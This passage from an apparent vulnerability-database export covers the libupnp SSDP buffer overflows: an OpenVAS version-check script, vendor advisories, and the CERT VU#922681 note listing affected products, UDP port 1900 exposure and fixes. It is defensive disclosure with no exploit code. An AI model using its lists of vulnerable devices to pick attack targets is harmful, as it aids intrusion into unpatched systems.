an\nAPI and open source code for building control points, devices, and\nbridges that are compliant with Version 1.0 of the Universal Plug and\nPlay Device Architecture Specification\";\ntag_solution = \"For the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.6-5+squeeze1.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.6.17-1.2.\n\nWe recommend that you upgrade your libupnp packages.\";\ntag_summary = \"Multiple stack-based buffer overflows were discovered in libupnp, a library\nused for handling the Universal Plug and Play protocol. HD Moore from Rapid7\ndiscovered that SSDP queries where not correctly handled by the\nunique_service_name() function.\n\nAn attacker sending carefully crafted SSDP queries to a daemon built on libupnp\ncould generate a buffer overflow, overwriting the stack, leading to the daemon\ncrash and possible remote code execution.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892614);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-5964\", \"CVE-2012-5962\", \"CVE-2012-5961\", \"CVE-2012-5959\", \"CVE-2012-5965\", \"CVE-2012-5963\", \"CVE-2012-5960\", \"CVE-2012-5958\");\n script_name(\"Debian Security Advisory DSA 2614-1 (libupnp - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-02-01 00:00:00 +0100 (Fri, 01 Feb 2013)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2614.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libupnp-dev\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp3\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp3-dbg\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp3-dev\", ver:\"1:1.6.6-5+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp-dev\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6-dbg\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6-dev\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libupnp6-doc\", ver:\"1:1.6.17-1.2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "UPnP stack implementation format string vulnerability", "edition": 1, "modified": "2013-02-11T00:00:00", "published": "2013-02-11T00:00:00", "id": "SECURITYVULNS:VULN:12852", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12852", "title": "Broadcom chipset routers format string vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:41", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5961", "CVE-2012-5965", "CVE-2012-5960", "CVE-2012-5959", "CVE-2012-5958", "CVE-2012-5964", "CVE-2012-5962", "CVE-2012-5963"], "description": "\nProject changelog reports:\n\nThis patch addresses three possible buffer overflows in\n\t function unique_service_name().The three issues have the\n\t folowing CVE numbers:\n\nCVE-2012-5958 Issue #2: Stack buffer overflow of Tempbuf\nCVE-2012-5959 Issue #4: Stack buffer overflow of Event->UDN\nCVE-2012-5960 Issue #8: Stack buffer overflow of Event->UDN\n\nNotice that the following issues have already been dealt by\n\t previous work:\n\nCVE-2012-5961 Issue #1: Stack buffer overflow of Evt->UDN\nCVE-2012-5962 Issue #3: Stack buffer overflow of Evt->DeviceType\nCVE-2012-5963 Issue #5: Stack buffer overflow of Event->UDN\nCVE-2012-5964 Issue #6: Stack buffer overflow of Event->DeviceType\nCVE-2012-5965 Issue #7: Stack buffer overflow of Event->DeviceType\n\n\n", "edition": 4, "modified": "2012-11-21T00:00:00", "published": "2012-11-21T00:00:00", "id": "2EA6CE3D-6AFD-11E2-9D4E-BCAEC524BF84", "href": "https://vuxml.freebsd.org/freebsd/2ea6ce3d-6afd-11e2-9d4e-bcaec524bf84.html", "title": "upnp -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2020-12-24T11:41:54", "bulletinFamily": "software", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "The Portable Software Developer Kit (SDK) for Universal Plug-n-Play (UPnP) Devices contains a libupnp library, originally known as the Intel SDK for UPnP Devices, which is vulnerable to multiple stack-based buffer overflows when handling malicious Simple Service Discovery Protocol (SSDP) requests. This library is used in several vendor network devices, in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at http://www.kb.cert.org/vuls/id/922681 [\"http://www.kb.cert.org/vuls/id/922681\"].\n\nThe Portable Software Developer Kit (SDK) for Universal Plug-n-Play (UPnP) Devices contains a libupnp library, originally known as the Intel SDK for UPnP Devices, which is vulnerable to multiple stack-based buffer overflows when handling malicious Simple Service Discovery Protocol (SSDP) requests. This library is used in several vendor network devices, in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at http://www.kb.cert.org/vuls/id/922681[\"http://www.kb.cert.org/vuls/id/922681\"].\n\nCisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\"]", "modified": "2013-02-13T22:34:59", "published": "2013-01-29T20:00:00", "id": "CISCO-SA-20130129-UPNP", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp", "type": "cisco", "title": "Portable SDK for UPnP Devices Contains Buffer Overflow Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:52", "bulletinFamily": "info", "cvelist": ["CVE-2012-5958", "CVE-2012-5959", "CVE-2012-5960", "CVE-2012-5961", "CVE-2012-5962", "CVE-2012-5963", "CVE-2012-5964", "CVE-2012-5965"], "description": "### Overview \n\nThe Portable SDK for UPnP Devices `libupnp` library contains multiple buffer overflow vulnerabilities. Devices that use `libupnp` may also [accept UPnP queries over the WAN interface](<http://www.kb.cert.org/vuls/id/357851>), therefore exposing the vulnerabilities to the internet.\n\n### Description \n\nUniversal Plug and Play (UPnP) is a set of network protocols designed to support automatic discovery and service configuration. The Portable SDK for UPnP Devices (`libupnp`) is an open source project that has its roots in the Linux SDK for UPnP Devices and software from Intel (Intel Tools for UPnP Technologies and later Developer Tools for UPnP Technologies). Intel no longer maintains or supports these tools. Many different vendors produce UPnP-enabled devices that use `libupnp`.\n\nAs part of a large scale security research project, [Rapid7](<http://www.rapid7.com/>) investigated internet-connected UPnP devices and found, among other security issues, multiple buffer overflow vulnerabilities in the `libupnp` implementation of the Simple Service Discovery Protocol (SSDP). Rapid7's report summarizes these vulnerabilities: \n \n**_Portable SDK for UPnP Devices unique_service_name() Buffer Overflows_** \n \n_The libupnp library is vulnerable to multiple stack-based buffer overflows when handling malicious SSDP requests. This library is used by tens of millions of deployed network devices, of which approximately twenty million are exposed directly to the internet. In addition to network devices, many streaming media and file sharing applications are also exposed to attack through this library._ \n \n_This advisory does not address historic or current vulnerabilities in the HTTP and SOAP processing code of libupnp._ \n \n**_Affected Versions_** \n_Versions 1.2 (Intel SDK) and 1.2.1a - 1.8.0 (Portable SDK) are affected by at least three remotely exploitable buffer overflows in the unique_service_name() function, which is called to process incoming SSDP requests on UDP port 1900. Additionally, versions prior to 1.6.17 are vulnerable to additional issues in the same function. Please see Appendix A for a review of the vulnerable code by version._ \n \n**_Affected Vendors_** \n_Hundreds of vendors have used the libupnp library in their products, many of which are acting as the home routers for consumer networks. Any application linking to libupnp is likely to be affected and a list of confirmed vendors and products is provided in Appendix B._ \n_ _ \nAdditional details may be found in a [paper](<https://community.rapid7.com/docs/DOC-2150>) and [advisory](<https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play>) from Rapid7.[](<https://community.rapid7.com/community/metasploit/blog/2013/01/29/upnp-considered-harmful>) \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code on the device or cause a denial of service. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \n[libupnp 1.6.18](<http://pupnp.sourceforge.net/>) has been released to address these vulnerabilities. \n \n--- \n \n**Restrict Access** \n \nDeploy firewall rules to block untrusted hosts from being able to access port 1900/udp. \n \n**Disable UPnP** \n \nConsider disabling UPnP on the device if it is not absolutely necessary. \n \n--- \n \n### Vendor Information\n\nWe attempted to notify more than 200 vendors identified by Rapid7 as running `libupnp`. The following list includes vendors who responded to our notification and vendors for whom we had existing security contact information. \n \n--- \n \n922681\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Axis __ Affected\n\nNotified: December 13, 2012 Updated: April 05, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAxis products included version 1.6.17 (or earlier) of the libupnp library. UPnP is enabled by default and is mainly used for discovery and NAT configuration. All releases prior to 5.50.2 are affected by this vulnerability except for the AXIS P135x-series where the correction was released in the latest 5.40.19.\n\n### Vendor Information \n\nAll Axis products running firmware verisons prior to 5.5x are potentially affected.\n\nAxis included the latest version 1.6.18 of UPnP in order to address the vulnerability and it will be available in release 5.50.2 or later. For prior releases, users are recommended to turn off UPnP (Available under System Options/Network/UPnP)\n\n### Cisco Systems, Inc. __ Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCisco is investigating this issue for potential impact to Cisco and Linksys products. Please consult our public documents on this issue here: \n \nCisco's Security Advisory: <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp> \n \nLinksys Knowledge Base article: [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp>\n * [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### D-Link Systems, Inc. __ Affected\n\nNotified: December 13, 2012 Updated: January 31, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nJanuary 30, 2013 UPDATE:\n\nAt the current time D-Link deploys firmware that has UPnP feature support on our devices. The UPnP features are enabled by software developer kits - Intel, Portable, and miniUPnP. \n \nRecently, it has been discovered that the following UPnP versions may have a security vulnerability that could cause devices to become unstable, impair functionality, or disclose the services the devices offers (i.e. network camera feed): \n \nAll Versions of Intel SDK \nVersion of Portable SDK prior to V. 1.6.18 \nVersion of MiniUPnP SDK prior to V. 1.1 \n \nSecurity and performance is of the utmost importance to D-Link across all product lines, including networking, surveillance, storage and entertainment solutions. \n \nThe company is currently assessing the recent findings surrounding UPnP technology and whether any D-Link products are susceptible to vulnerabilities. If any action is needed, D-Link will provide information online at www.dlink.com/upnp \n\n### Vendor Information \n\nCustomers that want to disable UPnP in the affected products can do so by following these steps: \n \nCurrent Solution for Affected Products by Disabling UPnP \n \nStep 1: Log into device wed configuration - For routers default URL \n \n<http://dlinkrouter.local> or <http://192.168.0.1> \n \nStep 2: Click on the Advanced tab at the top and then click on Advanced Network on the left-hand side. \nStep 3: Under the UPnP Settings section, uncheck the disabled UPnP buttons to disable UPnP on the device \nStep 4: Click Save Settings at the top to apply the settings. \n \n*** Please note that disabling UPnP might adversely affect features and capabilities of the device and/or supporting applications or devices connecting to these products. \n\n### Vendor References\n\n * <http://www.dlink.com/us/en/technology/upnp>\n\n### Fujitsu Technology Affected\n\nNotified: January 10, 2013 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Huawei Technologies Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Linksys __ Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCisco is investigating this issue for potential impact to Cisco and Linksys products. Please consult our public documents on this issue here: \n \nCisco's Security Advisory: <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp> \n \nLinksys Knowledge Base article: [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp>\n * [http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341](<http://homekb.cisco.com/Cisco2/ukp.aspx?vw=1&articleid=28341>)\n\n### NEC Corporation Affected\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/secinfo/nv13-003.html>\n\n### Siemens __ Affected\n\nNotified: December 13, 2012 Updated: January 30, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nFrom SSA-963338:\n\n_Siemens OZW and OZS products use the UPnP network protocol for supporting specific localization functions. The 3rd party library libupnp [1] used for this protocol is vulnerable to multiple stack-based buffer overflows, as reported by CERT-CC [2]. These vulnerabilities allow DoS attacks and possibly remote code execution if the affected network ports are reachable by an attacker. Siemens plans to provide official permanent fixes with upcoming firmware updates and product replacements, and describes a temporary workaround below. _ \nThe full advisory can be found at the URL below. \n\n### Vendor References\n\n * <http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf>\n\n### Sony Corporation __ Affected\n\nNotified: December 13, 2012 Updated: January 30, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following Sony products are affected by this vulnerability. Please access the links below for more details. \n \nMulti Channel AV Receiver : STR-DA3700ES, STR-DA5700ES \n \n[STR-DA5700ES] \nin USA: \n[http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA5700ES&news_id=461](<http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA5700ES&news_id=461>)\n\n \nin Canada: \n[http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA5700ES&news_id=461](<http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA5700ES&news_id=461>) \n \nin Europe(UK): \n<http://www.sony.co.uk/support/en/product/STR-DA5700ES/news/STR_DA_HN> \n \n[STR-DA3700ES] \nin USA: \n[http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA3700ES&news_id=461](<http://esupport.sony.com/US/p/news-item.pl?mdl=STRDA3700ES&news_id=461>) \nin Canada: \n[http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA3700ES&news_id=461](<http://esupport.sony.com/CA/p/news-item.pl?mdl=STRDA3700ES&news_id=461>) \nin Europe(UK): \n<http://www.sony.co.uk/support/en/product/STR-DA3700ES/news/STR_DA_HN>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Synology __ Affected\n\nNotified: December 13, 2012 Updated: February 28, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSynology products employ version 1.6.6 of the libupnp library for the following features: Video Station, Audio Station, Media Server, Surveillance Station, and EZ-Internet (UPnP router discovery).\n\nAll versions of DSM prior to DSM 4.2 are affected by this vulnerability. However, the vulnerability issue will be resolved in the official release of DSM 4.2, planned in March 2013.\n\n### Vendor Information \n\nTo avoid being affected by this vulnerability, users are recommended to do the following: \n \n* Deploy firewall rules to block untrusted hosts from being able to access port 1900/UDP. \n* Update to DSM 4.2 when it is officially released. \n \nUsers could also consider turning off UPnP features for the following applications: \n \n* Video Station: Stop running Video Station. \n* Audio Station: Turn off UPnP in the settings. \n* Media Server: Stop running Media Server. \n* EZ-Internet: Do not configure routers with EZ-Internet. \n* Surveillance: Do not add IP cameras by searching IP cams on LAN in Surveillance Station.\n\n### ipitomy __ Affected\n\nNotified: January 08, 2013 Updated: February 01, 2013 \n\n**Statement Date: January 31, 2013**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nIPitomy Communications\n\nResponse to CERT VU#922681 \n1/31/2013 \n \n**Summary** \n \nThe Software Developer Kit (SDK) for Universal Plug-n-Play (UPnP) Devices contains a library originally developed as the Intel SDK for UPnP Devices. Multiple stack-based buffer overflow vulnerabilities have been found in the popular versions of this library used on many network vendor devices. For more information on this vulnerability please visit: <http://www.kb.cert.org/vuls/id/922681> \n \n**Affected Products** \n \nIPitomy has not confirmed the vulnerability yet and is still investigating. However we are listing below the only products that could be affected as well as the recommended steps to prevent any potential exploitation of these vulnerabilities. \n \n**IP1000 and IP1000v2** \n \nThese products contain an affected version of the UPnP library. IPitomy recommends disabling UPnP permanently on these products. \nThis product defaults the UPnP setting to \u201con\u201d. \nNote we have scanned the IP1000 products from the WAN side and have determined that with the UPnP service on, the systems do not respond to UPnP requests from the WAN, therefore exploitation of these UPnP vulnerabilities would have to occur from the LAN side of the device. \n \n**IPR20** \n \nIPR20 contains router functionality. The UPnP service is disabled by default on these devices. IPitomy recommends that you ensure that UPnP service is disabled. \nIPitomy has confirmed that if UPnP service is enabled the device does not respond to UPnP requests on the WAN interface, therefore exploitation of these UPnP vulnerabilities would have to occur through the LAN side of the device. \nProperly installed (IPR20 WAN port connected to customer LAN), devices should not present these vulnerabilities.\n\n### Vendor References\n\n * <http://www.ipitomy.com/index.php/mi-security-notice-ip001>\n\n### Ubiquiti Networks Not Affected\n\nNotified: January 09, 2013 Updated: January 29, 2013 \n\n**Statement Date: January 10, 2013**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Yamaha Corporation Not Affected\n\nUpdated: February 01, 2013 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### teldat __ Not Affected\n\nUpdated: February 05, 2013 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n\\-------------------------\n\n| Teldat Security Bulletin | \n\\------------------------- \n \nBulletin ID: 2013-02-04 \nRevision: 1.0 \n \nTitle: \nPortable SDK for UPnP Devices (libupnp) contains multiple buffer overflows in SSDP \n(US-CERT Vulnerability Note VU#922681) \n \nSummary: \nUS-CERT Note VU#922681 describes that the \"Portable SDK for UPnP Devices libupnp\" library contains multiple buffer overflow vulnerabilities. Devices that use \"libupnp\" may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. A remote, unauthenticated attacker may be able to execute arbitrary code on the device or cause a denial of service. \n \nDetails can be found at <http://www.kb.cert.org/vuls/id/922681> and <https://community.rapid7.com/docs/DOC-2150> \n \nComment: \nThe UPnP implemention used in the BOSS operating system is a proprietary solution developed by Teldat, and no Teldat product running the BOSS operating system is affected. Note that products sold under the former company name of \"Funkwerk Enterprise Communications\" - if running the BOSS operating system - are equally not affected by this vulnaerablity. \n \nCopyright (c) 2013, Teldat GmbH. All Rights Reserved \n \n\\----- End Security Bulletin 2013-02-04 -----\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.teldat.org/download/en/products/security_bulletin/security_bulletin_2013-02-05_advisory.txt>\n\n### 3com Inc Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Geexbox Unknown\n\nNotified: January 11, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: February 01, 2013 Updated: February 01, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Koukaam Unknown\n\nNotified: January 10, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Logitech Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Motorola, Inc. Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netgear, Inc. Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pantech North America Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: December 04, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SFR Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SMC Networks, Inc. Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sitecom Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TP-Link Unknown\n\nNotified: January 04, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Texas Instruments Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: December 04, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Visual Tools Unknown\n\nNotified: January 10, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: December 13, 2012 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### orb Networks Unknown\n\nNotified: January 16, 2013 Updated: January 29, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 35 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.7 | E:H/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://pupnp.sourceforge.net/>\n * <https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play>\n * <https://community.rapid7.com/docs/DOC-2150>\n * <https://community.rapid7.com/servlet/JiveServlet/download/2150-1-16596/SecurityFlawsUPnP.pdf>\n * <http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp>\n * <http://www.kb.cert.org/vuls/id/357851>\n * <http://opentools.homeip.net/dev-tools-for-upnp>\n * <http://upnp.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to HD Moore of Rapid7 for reporting this vulnerability, and Tod Beardsley for coordination support.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-5958](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5958>), [CVE-2012-5959](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5959>), [CVE-2012-5960](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5960>), [CVE-2012-5961](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5961>), [CVE-2012-5962](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5962>), [CVE-2012-5963](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5963>), [CVE-2012-5964](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5964>), [CVE-2012-5965](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-5965>) \n---|--- \n**Date 